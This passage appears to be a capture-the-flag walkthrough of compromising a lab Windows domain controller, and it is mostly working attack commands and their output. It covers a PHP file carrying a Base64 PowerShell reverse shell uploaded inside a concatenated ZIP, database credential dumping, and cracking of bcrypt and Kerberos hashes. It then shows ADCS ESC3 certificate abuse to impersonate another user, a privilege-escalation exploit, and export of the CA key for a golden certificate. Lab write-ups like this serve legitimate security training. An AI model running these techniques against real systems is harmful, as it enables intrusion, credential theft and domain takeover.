  • Create a PHP file containing a PowerShell reverse shell that uses the Base64 payload from Revshells (PowerShell #3 — Base64).
1
2
3
<?php
shell_exec("powershell -e JABjAGwAaQBlAG4.....kAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==");
?>
  • Archive the malicious file:
1
zip malicious.zip normal.php
  • Concatenate the malicious and benign archives to produce a single uploadable ZIP:
1
cat malicious.zip benign.zip > shell.zip
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ echo "hello world" > newfile.txt
                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ pandoc newfile.txt  -o normal.pdf
                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ zip benign.zip normal.pdf
  adding: normal.pdf (deflated 2%)
                                                                                                   
                                                                                                   
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2/malicious_files]
└─$ nano normal.php
                                                                                                                                                                  
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ zip malicious.zip normal.php 
  adding: normal.php (deflated 54%)
                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ cat benign.zip malicious.zip > shell.zip
                                                                                                                                                       

Upload shell.zip and set up a listener:

1
nc -lvnp 4444

After submitting the .zip file, click on the HERE link.

Error loading image

A URL will look like:

1
http://certificate.htb/static/uploads/67db7d1b1b004bcdb4f6a514edd6fca8/normal.pdf

Change it to:

1
http://certificate.htb/static/uploads/67db7d1b1b004bcdb4f6a514edd6fca8/normal.php

Send a request through curl:

1
curl http://certificate.htb/static/uploads/67db7d1b1b004bcdb4f6a514edd6fca8/normal.php

And we get a session:

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ nc -lvnp  1337
listening on [any] 1337 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.11.71] 57868

PS C:\xampp\htdocs\certificate.htb\static\uploads\67db7d1b1b004bcdb4f6a514edd6fca8> whoami
certificate\xamppuser
PS C:\xampp\htdocs\certificate.htb\static\uploads\67db7d1b1b004bcdb4f6a514edd6fca8>         

Under C:\xampp\htdocs\certificate.htb we have a db.php file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
PS C:\xampp\htdocs\certificate.htb> ls


    Directory: C:\xampp\htdocs\certificate.htb


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       12/26/2024   1:49 AM                static                                                                
-a----       12/24/2024  12:45 AM           7179 about.php                                                             
-a----       12/30/2024   1:50 PM          17197 blog.php                                                              
-a----       12/30/2024   2:02 PM           6560 contacts.php                                                          
-a----       12/24/2024   6:10 AM          15381 course-details.php                                                    
-a----       12/24/2024  12:53 AM           4632 courses.php                                                           
-a----       12/23/2024   4:46 AM            549 db.php                                                                
-a----       12/22/2024  10:07 AM           1647 feature-area-2.php                                                    
-a----       12/22/2024  10:22 AM           1331 feature-area.php                                                      
-a----       12/22/2024  10:16 AM           2955 footer.php                                                            
-a----       12/23/2024   5:13 AM           2351 header.php                                                            
-a----       12/24/2024  12:52 AM           9497 index.php                                                             
-a----       12/25/2024   1:34 PM           5908 login.php                                                             
-a----       12/23/2024   5:14 AM            153 logout.php                                                            
-a----       12/24/2024   1:27 AM           5321 popular-courses-area.php                                              
-a----       12/25/2024   1:27 PM           8240 register.php                                                          
-a----       12/28/2024  11:26 PM          10366 upload.php                                                            


PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
PS C:\xampp\htdocs\certificate.htb> 

The credentials are for the MySQL database. To connect we need the MySQL client/binary.

  • Username: certificate_webapp_user
  • Password: cert!f!c@teDBPWD

Database Access and Hash Cracking

Under C:\xampp\mysql\bin\ we have mysql.exe.

Databases

1
.\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db;
1
2
3
4
5
6
7
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "SHOW DATABASES;"
Database
certificate_webapp_db
information_schema
test

Table in certificate_webapp_db

1
.\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; SHOW TABLES;"
1
2
3
4
5
6
7
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; SHOW TABLES;"
Tables_in_certificate_webapp_db
course_sessions
courses
users
users_courses

User Table Structure

1
.\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; DESCRIBE users;"
1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; DESCRIBE users;"
Field   Type    Null    Key     Default Extra
id      int(11) NO      PRI     NULL    auto_increment
first_name      varchar(50)     NO              NULL
last_name       varchar(50)     NO              NULL
username        varchar(50)     NO      UNI     NULL
email   varchar(50)     NO      UNI     NULL
password        varchar(255)    NO              NULL
created_at      timestamp       YES             current_timestamp()
role    enum('student','teacher','admin')       YES             NULL
is_active       tinyint(1)      NO              1
PS C:\xampp\mysql\bin> 

Formated hashes and username

1
.\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; SELECT username,password FROM users LIMIT 8;"
1
2
3
4
5
6
7
8
9
10
11
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -h 127.0.0.1 -e "USE certificate_webapp_db; SELECT username,password FROM users LIMIT 8;"
username        password
Lorra.AAA       $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
Sara1200        $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
Johney  $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
stev    $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b  $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
testSTAFF@gmail.com     $2y$04$4rbQQnNiRwaLplx0dTLtOOSobeoVhy7ihgq6cTZb4Vw0UgVo0by4i
test@gmail.com  $2y$04$fT71xs6tv/2yCgMiSDQLZ.IdykNim5IV6ctrOvbxWdYLpU5ZhoG/G
PS C:\xampp\mysql\bin>

Hash Cracking

After cracking, we successfully recovered the password for user sara.b.

1
john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ echo '$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6' > sara_hash
                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt sara_hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Blink182         (?)     
1g 0:00:00:01 DONE (2025-06-01 14:31) 0.6849g/s 8383p/s 8383c/s 8383C/s delboy..vallejo
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

  • Username: sara.b
  • Password: Blink182

Access as Sara

Valid credentials for sara.b were confirmed via WinRM:

1
2
3
4
5
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ nxc winrm 10.10.11.71 -u sara.b -p Blink182
WINRM       10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\sara.b:Blink182 (Pwn3d!)
                                                     

Before logging in as sara.b, data collection for Active Directory enumeration was performed:

1
bloodhound-python -dc dc01.certificate.htb  -u 'sara.b' -p 'Blink182' -d certificate.htb -c All --zip -ns 10.10.11.71

Connected to sara.b and found a WS-01 folder in Documents containing Description.txt and a packet capture:

1
evil-winrm -i 10.10.11.71 -u sara.b -p 'Blink182'                               
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ evil-winrm -i 10.10.11.71 -u sara.b -p 'Blink182'                               
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Sara.B\Documents> ls


    Directory: C:\Users\Sara.B\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        11/4/2024  12:53 AM                WS-01


*Evil-WinRM* PS C:\Users\Sara.B\Documents> cd WS-01
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> ls


    Directory: C:\Users\Sara.B\Documents\WS-01


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        11/4/2024  12:44 AM            530 Description.txt
-a----        11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap


*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> download WS-01_PktMon.pcap
                                        
Info: Downloading C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> exit
                                        
Info: Exiting with code 0

Parsing Kerberos pre-auth data

The Description.txt contains the following notification:

1
2
3
4
5
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ cat Description.txt 
��The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!

After opening the capture in Wireshark we found SMB packets and several Kerberos packets (AS-REQ, AS-REP and TGS-REP).

Error loading image

The capture contains Kerberos pre-authentication data that can be extracted for offline password cracking. To parse Kerberos packets from the .pcap and generate crackable hashes we used:

Krb5RoastParser

Tool Description: Krb5RoastParser is a tool designed to parse Kerberos authentication packets (AS-REQ, AS-REP and TGS-REP) from .pcap files and generate password-cracking-compatible hashes for security testing. By leveraging tshark, Krb5RoastParser extracts necessary details from Kerberos packets, providing hash formats ready for tools like Hashcat.

After parsing the PCAP we extracted a Kerberos pre-auth hash for user lion.sk:

1
2
3
4
5
6
7
8
                                         
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2/Krb5RoastParser]
└─$ python3 krb5_roast_parser.py ../WS-01_PktMon.pcap as_req
$krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
                                                                                                                                                             
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2/Krb5RoastParser]
└─$ 

Hash cracking (hashcat):

1
$krb5pa$18$Lion.SK$CERTIFICATE$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
1
hashcat -m 19900 krb_hash /usr/share/wordlists/rockyou.txt

Credentials found

  • Username: lion.sk
  • Password: !QAZ2wsx

Access a lion.sk

Using nxc we validated the cracked credentials against the target:

1
2
3
4
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$  nxc smb 10.10.11.71 -u lion.sk -p '!QAZ2wsx'
SMB         10.10.11.71     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certifite.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.71     445    DC01             [+] certificate.htb\lion.sk:!QAZ2wsx 

And confirmed WinRM access:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$  nxc winrm 10.10.11.71 -u lion.sk -p '!QAZ2wsx'
WINRM       10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificatetb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptogphy.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\lion.sk:!QAZ2wsx (Pwn3d!)
                                        

and we are abe to smn and winrm

1
2
evil-winrm -i 10.10.11.71 -u lion.sk -p !QAZ2wsx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2]
└─$ evil-winrm -i 10.10.11.71 -u lion.sk -p !QAZ2wsx                                       
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Lion.SK\Documents> type ..\Desktop\user.txt
************9aaefa2c06950c8debb
*Evil-WinRM* PS C:\Users\Lion.SK\Documents> 
*Evil-WinRM* PS C:\Users\Lion.SK\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
                                    

ADCS ESC 3 From lion.sk -> ryan

Viewing BloodHound shows lion.sk is a member of three groups — the interesting one is Domain CRA Managers.

Enumeration

Error loading image

We ran certipy find as lion.sk and discovered a user-enrollable template (Delegated-CRA) with the Certificate Request Agent EKU, flagged as ESC3 — indicating an ADCS ESC3 attack path is possible.

1
certipy find -u lion.sk -p '!QAZ2wsx' -dc-ip 10.10.11.71 -stdout  -vulnerable                             
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFICATE.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        ManageCertificates              : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
                                                                                         

For ESC3 we require 2 certificate templates with the following configuration

  • Template 1: Provides Enrollment Agent Certificate – Certificate Request Agent EKU –> 1.3.6.1.4.1.311.20.2.1 is enabled. – Enrollment Rights are enabled for a user that we control.
  • Template 2: Allows Enrollment Agent Certificate to use on-behalf-of – Client Authentication EKU –> 1.3.6.1.5.5.7.3.2 is enabled. – Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1 along with Certificate Request Agent EKU enabled. – Enrollment Rights are enabled for a user that we control.

After reviewing users in BloodHound, none were immediately interesting, but we identified ryan as a member of Domain Storage Managers. We will target ryan and proceed with the ESC3 (Certificate Request Agent EKU) attack path.

Error loading image

ESC3 Abuse

Requests a certificate for the current user (lion.sk) using a vulnerable template (Delegated-CRA) that allows certificate delegation.

1
2
3
4
5
6
certipy-ad req -u 'lion.sk@certificate.htb' \        
            -p '!QAZ2wsx' \
            -dc-ip '10.10.11.71' \
            -target 'dc01.certificate.htb' \
            -ca 'Certificate-LTD-CA' \
            -template 'Delegated-CRA'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ certipy-ad req -u 'lion.sk@certificate.htb' \        
            -p '!QAZ2wsx' \
            -dc-ip '10.10.11.71' \
            -target 'dc01.certificate.htb' \
            -ca 'Certificate-LTD-CA' \
            -template 'Delegated-CRA'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 22
[*] Successfully requested certificate
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saving certificate and private key to 'lion.sk.pfx'
[*] Wrote certificate and private key to 'lion.sk.pfx'

Requests a certificate on behalf of RYAN.K using the SignedUser template and saves it as lion.sk.pfx.

1
2
3
4
5
6
7
8
9
certipy-ad req \
  -u 'lion.sk@certificate.htb' \
  -p '!QAZ2wsx' \
  -dc-ip '10.10.11.71' \
  -target 'dc01.certificate.htb' \
  -ca 'Certificate-LTD-CA' \
  -template 'SignedUser' \
  -pfx 'lion.sk.pfx' \
  -on-behalf-of 'CERTIFICATE\RYAN.K'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ certipy-ad req \
  -u 'lion.sk@certificate.htb' \
  -p '!QAZ2wsx' \
  -dc-ip '10.10.11.71' \
  -target 'dc01.certificate.htb' \
  -ca 'Certificate-LTD-CA' \
  -template 'SignedUser' \
  -pfx 'lion.sk.pfx' \
  -on-behalf-of 'CERTIFICATE\RYAN.K'

Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 23
[*] Successfully requested certificate
[*] Got certificate with UPN 'RYAN.K@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saving certificate and private key to 'ryan.k.pfx'
[*] Wrote certificate and private key to 'ryan.k.pfx'

Authenticates as RYAN.K using the previously obtained certificate ryan.k.pfx.

1
certipy auth -pfx ryan.k.pfx -dc-ip 10.10.11.71
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ sudo ntpdate 10.10.11.71 &&certipy-ad auth -pfx ryan.k.pfx -dc-ip 10.10.11.71
  
2025-10-05 10:54:05.132405 (-0400) +542.583734 +/- 0.092811 10.10.11.71 s1 no-leap
CLOCK: time stepped by 542.583734
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'RYAN.K@certificate.htb'
[*]     Security Extension SID: 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Using principal: 'ryan.k@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ryan.k.ccache'
[*] Wrote credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6                                    

Verified WinRM access to ryan.k using the exported hash:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ netexec winrm 10.10.11.71 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
WINRM       10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pwn3d!)
WINRM       10.10.11.71     5985   DC01             [-] certificate.htb\ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 zip() argument 2 is longer than argument 1

SeManageVolumePrivilege Abuse -> Administrator

After logging in, we can see this user has an interesting privilege: SeManageVolumePrivilege.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~/HTB-machine/certificate/try2/Krb5RoastParser]
└─$ evil-winrm -i 10.10.11.71 -u ryan.k -H b1bc3d70e70f4f36b1509a65ae1a2ae6
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 

Before running .exe

1
upload SeManageVolumeExploit.exe

List Access Control List flag (ACE)

1
icacls "C:\Users"
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> upload SeManageVolumeExploit.exe
                                        
Info: Uploading /home/kali/HTB-machine/certificate/try1/SeManageVolumeExploit.exe to C:\Users\Ryan.K\Documents\SeManageVolumeExploit.exe
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> icacls "C:\Users"
C:\Users NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Administrators:(OI)(CI)(F)
         BUILTIN\Pre-Windows 2000 Compatible Access:(RX)
         BUILTIN\Pre-Windows 2000 Compatible Access:(OI)(CI)(IO)(GR,GE)
         Everyone:(RX)
         Everyone:(OI)(CI)(IO)(GR,GE)
  • OI = Object Inherit
  • CI = Container Inherit
  • IO = Inherit Only
  • F = Full Control
  • RX = Read and Execute
  • GR = Generic Read
  • GE = Generic Execute

Point:

SYSTEM has full access to everything inside C:\Users.

Administrators group has full access.

Everyone:(RX) All users can read and execute inside C:\Users, but can’t write.

After Running .exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> .\SeManageVolumeExploit.exe
Entries changed: 845

DONE

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> icacls "C:\Users"
C:\Users NT AUTHORITY\SYSTEM:(OI)(CI)(F)
         BUILTIN\Users:(OI)(CI)(F)
         BUILTIN\Pre-Windows 2000 Compatible Access:(RX)
         BUILTIN\Pre-Windows 2000 Compatible Access:(OI)(CI)(IO)(GR,GE)
         Everyone:(RX)
         Everyone:(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 

BUILTIN\Users:(OI)(CI)(F) — All normal users have Full Control over C:\Users

List all certificates in the “My” certificate store (also known as the Personal store) for the current user.

Golden Certificate Attack

List all certificates in the My (Personal) certificate store for the current user:

1
certutil -store my
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> certutil -store my
my "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:30 PM
 NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
  Key Container = certificate-DC01-CA
  Unique container name: 6f761f351ca79dc7b0ee6f07b40ae906_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed

================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Simple container name: te-DomainController-3ece1f1c-d299-4a4d-be95-efa688b7fee2
  Provider = Microsoft RSA SChannel Cryptographic Provider
Private key is NOT exportable
Encryption test passed

================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
CertUtil: -store command completed successfully.
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 

Export the CA certificate (identified by its serial number) from the My store as a PFX file:

1
certutil -exportpfx my "75b2f4bbf31f108945147b466131bdca" ca_exported.pfx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> 
